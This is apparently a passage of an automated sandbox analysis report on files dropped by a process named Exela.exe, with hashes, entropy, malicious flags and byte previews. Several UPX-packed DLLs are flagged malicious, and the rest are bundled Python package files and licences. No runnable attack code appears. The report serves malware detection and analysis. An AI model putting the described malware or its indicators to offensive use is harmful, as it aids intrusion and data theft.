                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24960
                                                                                                                                                                                                                                                          Entropy (8bit):7.454617838702341
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:c90Psz9rLZgNhzHjlnwX1hZa7gJXjDID7UuNBIYiSy1pCQYIPxh8E9VF0Nyb9:cjihFn43pzDID7Uu4YiSyv7PxWER
                                                                                                                                                                                                                                                          MD5:0614691624F99748EF1D971419BDB80D
                                                                                                                                                                                                                                                          SHA1:39C52450ED7E31E935B5B0E49D03330F2057747D
                                                                                                                                                                                                                                                          SHA-256:AC7972502144E9E01E53001E8EEC3FC9AB063564678B784D024DA2036BA7384D
                                                                                                                                                                                                                                                          SHA-512:184BC172C7BB8A1FB55C4C23950CBE5E0B5A3C96C1C555ED8476EDF79C5C729ED297112EE01B45D771E5C0055D2DC402B566967D1900B5ABF683EE8E668C5B26
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42872
                                                                                                                                                                                                                                                          Entropy (8bit):7.71252337640455
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2Q8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:2TieXEhow072IDQwzFD7Sy+Px3sxi
                                                                                                                                                                                                                                                          MD5:04E7EB0B6861495233247AC5BB33A89A
                                                                                                                                                                                                                                                          SHA1:C4D43474E0B378A00845CCA044F68E224455612A
                                                                                                                                                                                                                                                          SHA-256:7EFE25284A4663DF9458603BF0988B0F47C7DCF56119E3E853E6BDA80831A383
                                                                                                                                                                                                                                                          SHA-512:D4EA0484363EDF284AC08A1C3356CC3112D410DD80FE5010C1777ACF88DBD830E9F668B593E252033D657A3431A79F7B68D09EB071D0C2CEB51632DBE9B8ED97
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56192
                                                                                                                                                                                                                                                          Entropy (8bit):7.831040417505209
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:qfDL703/MAe3F53jYTG3vy+1MNLjZVID5QjI7SyBPx:kD03/MHbH6+eL/ID5QjIXx
                                                                                                                                                                                                                                                          MD5:D9EEEEACC3A586CF2DBF6DF366F6029E
                                                                                                                                                                                                                                                          SHA1:4FF9FB2842A13E9371CE7894EC4FE331B6AF9219
                                                                                                                                                                                                                                                          SHA-256:67649E1E8ACD348834EFB2C927AB6A7599CF76B2C0C0A50B137B3BE89C482E29
                                                                                                                                                                                                                                                          SHA-512:0B9F1D80FB92C796682DBA94A75FBCE0E4FBEAEDCCD50E21D42D4B9366463A830109A8CD4300AA62B41910655F8CA96ECC609EA8A1B84236250B6FD08C965830
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!.........`..P....p...................................0............`..........................................+..P....)....... .......................+..$...................................P...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):62336
                                                                                                                                                                                                                                                          Entropy (8bit):7.846104968038435
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:I6ll/oOM5AGIyI1asq3YGDTgzOordBQkJIDt7o7/7Syi/Px:d/6AGLIcsq3YGn0ZQuIDt7ojEHx
                                                                                                                                                                                                                                                          MD5:FD0F4AED22736098DC146936CBF0AD1D
                                                                                                                                                                                                                                                          SHA1:E520DEF83B8EFDBCA9DD4B384A15880B036EE0CF
                                                                                                                                                                                                                                                          SHA-256:50404A6A3DE89497E9A1A03FF3DF65C6028125586DCED1A006D2ABB9009A9892
                                                                                                                                                                                                                                                          SHA-512:C8F3C04D87DA19041F28E1D474C8EB052FE8C03FFD88F0681EF4A2FFE29755CFD5B9C100A1B1D2FDB233CB0F70E367AF500CBD3CD4CE77475F441F2B2AA0AB8A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............0.....................................................`.........................................p...d....................P......................................................@...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):22400
                                                                                                                                                                                                                                                          Entropy (8bit):7.3532819751791
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:MKbjUslT27KvpCuNZa7gJXTkIDewOYKIYiSy1pCQIJPxh8E9VF0NyYk:MIj3ltLNpDkIDewO6YiSyvWPxWEW
                                                                                                                                                                                                                                                          MD5:3377AE26C2987CFEE095DFF160F2C86C
                                                                                                                                                                                                                                                          SHA1:0CA6AA60618950E6D91A7DEA530A65A1CDF16625
                                                                                                                                                                                                                                                          SHA-256:9534CB9C997A17F0004FB70116E0141BDD516373B37BBD526D91AD080DAA3A2B
                                                                                                                                                                                                                                                          SHA-512:8E408B84E2130FF48B8004154D1BDF6A08109D0B40F9FAFB6F55E9F215E418E05DCA819F411C802792A9D9936A55D6B90460121583E5568579A0FDA6935852EE
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Rp^.<#^.<#^.<#W..#\.<#..="\.<#..9"R.<#..8"V.<#..?"].<#..="\.<#..="[.<#^.=#t.<#..4"_.<#..<"_.<#...#_.<#..>"_.<#Rich^.<#................PE..d...e.Vc.........." ...!. .......`.......p................................................`.........................................8...L....................@..........................................................@...........................................UPX0.....`..............................UPX1..... ...p......................@....rsrc................"..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27136
                                                                                                                                                                                                                                                          Entropy (8bit):7.693716350158679
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:XQdVWwViGwdnG0o2JAP2XSc4oX3vkULZjlvPM2YZa7gJXnfV:Ad0EipntaRDoX3vkULZ0pv
                                                                                                                                                                                                                                                          MD5:09B11699CDBA4BC48CC6885A87AF625A
                                                                                                                                                                                                                                                          SHA1:4F2882A14AEA02B8FBF880485F19C43BA1F853AD
                                                                                                                                                                                                                                                          SHA-256:F6FE3A897A1D55E7F5DE95F81EA6FCBC791329D6EAEF6F33EB4227043B87ADC1
                                                                                                                                                                                                                                                          SHA-512:C74C8CAFFD7B4C04828A0FF13EFFFE35FEEB28917BED80179B1A4A9E8750C2E2156CE1307FB737EFD8B4BF6CE2FDA09B301BF33AC216045CF7638681DB2D3368
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z29X.SW..SW..SW..+...SW..,V..SW.U+V..SW..,R..SW..,S..SW..,T..SW.$.V..SW..SV..SW.$._..SW.$.W..SW.$...SW.$.U..SW.Rich.SW.........................PE..d......e.........." ...%.p...........C.......................................p............`.........................................@b..`....`..P....`.......................b..$....................................O..@...........................................UPX0....................................UPX1.....p.......b..................@....rsrc........`.......f..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):79872
                                                                                                                                                                                                                                                          Entropy (8bit):7.9353741019489705
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:4FIPjnlL32iiGJpS0Z+UxiExV0/bER75h53U4nOlI4:80peGNZ+iagJ5h53s
                                                                                                                                                                                                                                                          MD5:F1F62B84C0B35781907BB21592BC4505
                                                                                                                                                                                                                                                          SHA1:FE87D2FFAD8CE88DB37BAFCC99D81A217A08AB9F
                                                                                                                                                                                                                                                          SHA-256:D0DDA39645E4C7077FFB31B51A20765406C4D93A2DF4D1813ED7EE639D9C002A
                                                                                                                                                                                                                                                          SHA-512:B901B769802C1D5C9DD2CFA2585386FA1C3D824A335262C9306DA2AA01924E52D132C20B913940A1CF9D27251C041B5470AA652B4E6A072A7644D328DC270923
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t.Q.t.Q.t.Q...Q.t.Q...P.t.Q...P.t.Q..P.t.Q.t.QIt.Q...P.t.Q...P.t.Q...P.t.Q..P.t.Q..P.t.Q..}Q.t.Q..P.t.QRich.t.Q........................PE..d......e.........." ...%.0.......P.......`................................................`.............................................h................... .........................................................@...........................................UPX0.....P..............................UPX1.....0...`...0..................@....rsrc................4..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25088
                                                                                                                                                                                                                                                          Entropy (8bit):7.661905261398898
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:GiunSGZm7hiJD/0PBnll7Y7KdZ/Lxm1/dnRo4KiVU7C8/4bKSAHZa7gJX4PGV:Gn1IliJDi5lW250VU7C8DS0pG
                                                                                                                                                                                                                                                          MD5:4D3A451A342357750063C159CD2757CF
                                                                                                                                                                                                                                                          SHA1:EB2D48A21B4A71279D3BE521E7B6DB2F39E1C435
                                                                                                                                                                                                                                                          SHA-256:8EC1721DF7AD36C7F770E7A7A5B0E4A0016D9CEFC349148E8C28220D58619FCF
                                                                                                                                                                                                                                                          SHA-512:4378ADC0546A4ED430EE2CBB14FBB62424C7C135335E0DFF8A677991105F5A83DDF4B36C694AE6FE473DA20B88182361274E27FD71A5B20CE2F01D4E36963ED3
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j29T.SW..SW..SW.'+..,SW.;,V.,SW.e+V.,SW.;,R."SW.;,S.&SW.;,T.-SW...V.-SW..SV..SW..._./SW...W./SW..../SW...U./SW.Rich.SW.................PE..d......e.........." ...%.`...........k... ................................................`.........................................@...h.......P............ ..$....................................................w..@...........................................UPX0....................................UPX1.....`... ...Z..................@....rsrc................^..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19968
                                                                                                                                                                                                                                                          Entropy (8bit):7.578746674923
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:p5nVmLcfRdmmokNVjFEci6Vnqz4hmlxjP/dHZa7gJXLh:A2RdmxkzT904hwBp7
                                                                                                                                                                                                                                                          MD5:791D5C587C717986B9F43BCB197B9E18
                                                                                                                                                                                                                                                          SHA1:3E460EFE0AEAB8F776658C3B776FB148650FE5F2
                                                                                                                                                                                                                                                          SHA-256:5D74710030F51EEE0E7B4DE7B53EC45B552F01C2016767EA12038D0E23999896
                                                                                                                                                                                                                                                          SHA-512:785BC62A274E05E315A278B143AFC6B597444BA61D420A4A2C2DCD7C46B08AB03AECA42429B6C6E8D548405E1602AEB24312F85878F12AB19CEA0985DAE28131
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z29[.SW..SW..SW..+...SW..,V..SW.U+V..SW..,R..SW..,S..SW..,T..SW.$.V..SW..SV..SW.$._..SW.$.W..SW.$...SW.$.U..SW.Rich.SW.........................PE..d......e.........." ...%.P..........`.....................................................`.........................................@...d.......P...............4...................................................`...@...........................................UPX0....................................UPX1.....P.......F..................@....rsrc................J..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (367)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9531
                                                                                                                                                                                                                                                          Entropy (8bit):5.159292758435694
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:LisUYxxPRtXLt5D6kyEqOmoKTYoEJdQ/0GmlWEx+VqAJk6O8mEISuJ5LdYDE:LisTdHyEqHoKtgAml9rAvOsFuJ5L2DE
                                                                                                                                                                                                                                                          MD5:E32D387A89F0114B8F9B9A809905299D
                                                                                                                                                                                                                                                          SHA1:A055C9FBF5416C83D5150D49CA16C58762B8B84A
                                                                                                                                                                                                                                                          SHA-256:5B0BC6ECE1F22A310FA72154642098B759F413F09CA9D45BEDB96218475C9BE0
                                                                                                                                                                                                                                                          SHA-512:6EEE3E19AF46A79E2110678F8D3D15EA4B2EB1355D0FC9581DA2C8E91D28926A2771394EA447E15CBC311A9DD9DE2A20E2AC0E0ABF9DB6D4D51982199A12E881
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: attrs.Version: 23.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3555
                                                                                                                                                                                                                                                          Entropy (8bit):5.799512812060909
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:QixWFmx02/o/+chE6dwB1NbXmUuAqG2WXJARGD+qLtxO:qMJchiRXnuA/XJSiO
                                                                                                                                                                                                                                                          MD5:0461AB56C7D588C2D9596F91E16658EC
                                                                                                                                                                                                                                                          SHA1:013E2923CAC817D68EE9ECF9A812E41707C4C7FD
                                                                                                                                                                                                                                                          SHA-256:A6DE30062543C20B137871403F784F12622118583313E9288A9389C005DE59AF
                                                                                                                                                                                                                                                          SHA-512:DD217FCCDD005EC00C34621EDD879A6DAC57F11065DDD628D0166FC3F2D78F32E282CCA86AEAB71D80928D834657A1E1D8D704F2A3BEF98410EE2D2E614A9590
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:attr/__init__.py,sha256=WlXJN6ICB0Y_HZ0lmuTUgia0kuSdn2p67d4N6cYxNZM,3307..attr/__init__.pyi,sha256=u08EujYHy_rSyebNn-I9Xv2S_cXmtA9xWGc0cBsyl18,16976..attr/__pycache__/__init__.cpython-311.pyc,,..attr/__pycache__/_cmp.cpython-311.pyc,,..attr/__pycache__/_compat.cpython-311.pyc,,..attr/__pycache__/_config.cpython-311.pyc,,..attr/__pycache__/_funcs.cpython-311.pyc,,..attr/__pycache__/_make.cpython-311.pyc,,..attr/__pycache__/_next_gen.cpython-311.pyc,,..attr/__pycache__/_version_info.cpython-311.pyc,,..attr/__pycache__/converters.cpython-311.pyc,,..attr/__pycache__/exceptions.cpython-311.pyc,,..attr/__pycache__/filters.cpython-311.pyc,,..attr/__pycache__/setters.cpython-311.pyc,,..attr/__pycache__/validators.cpython-311.pyc,,..attr/_cmp.py,sha256=OQZlWdFX74z18adGEUp40Ojqm0NNu1Flqnv2JE8B2ng,4025..attr/_cmp.pyi,sha256=sGQmOM0w3_K4-X8cTXR7g0Hqr290E8PTObA9JQxWQqc,399..attr/_compat.py,sha256=QmRyxii295wcQfaugWqxuIumAPsNQ2-RUF82QZPqMKw,2540..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):87
                                                                                                                                                                                                                                                          Entropy (8bit):4.699003560068366
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:RtEeXAaCTUhvhjP+tPCCfA5I:Rt2PYhvxWBB3
                                                                                                                                                                                                                                                          MD5:C58F7D318BAA542F6BFD220F837AB63F
                                                                                                                                                                                                                                                          SHA1:F655FC3C0EB1BF12629C5750B2892BD896C3E7D9
                                                                                                                                                                                                                                                          SHA-256:99161210BDC887A8396BF095308730885FFFD007B8FE02D8874D5814DC22AB59
                                                                                                                                                                                                                                                          SHA-512:3DA6980A39C368AB7F7527FCD5FCDAA9D321060174BAAE163BF73F8052A2AC1A73F476C3882855965DFC2CB13C7C3EC1A012882201389DAC887F9BE59540C80F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: hatchling 1.21.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1109
                                                                                                                                                                                                                                                          Entropy (8bit):5.104415762129373
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                                          MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                                                                                                                                                                          SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                                                                                                                                                                          SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                                                                                                                                                                          SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):197
                                                                                                                                                                                                                                                          Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11360
                                                                                                                                                                                                                                                          Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                          Encrypted:false
